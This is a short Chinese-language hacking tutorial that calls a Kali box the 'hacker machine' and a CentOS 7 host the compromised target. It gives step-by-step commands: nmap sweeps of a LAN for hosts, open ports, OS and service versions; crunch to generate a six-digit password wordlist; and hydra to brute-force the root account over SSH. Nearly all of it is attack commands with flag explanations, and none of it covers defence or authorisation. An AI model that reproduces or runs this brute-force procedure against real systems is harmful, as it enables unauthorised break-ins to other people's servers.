环境准备:
1,kali //黑客机
2,centos7 //肉鸡
3,hydra //系统自带工具
4,crunch //系统自带工具
操作步骤:
1,扫描网段里的目标主机
nmap -sP 192.168.1.1-255 //扫描网段主机
nmap -sS 192.168.1.188 //扫描端口开放情况
nmap -O 192.168.1.188 //扫描系统,版本信息
nmap -sV 192.168.1.188 //扫描应用程序和应程序版本号
扫描到22端口是开着的,进行下一步操作,
2,生成密码字典
crunch 6 6 123456 -d 1 -o 1.1txt
最小六位数,最大六位数,
密码组成数字是123456
1.1txt是生成密码后的文件
3,暴力破解
hydra -l root -P 1.1txt 192.168.1.188 ssh
也可以这样
hydra -l root -P 1.1txt ssh://192.168.1.188
-l ------------------------- 指定用户
-P -------------------------指定密码字典
ssh -----------------------指定端口
我用是密码字典是我自己写的,也可以用密码字典生成,
但是破解速度慢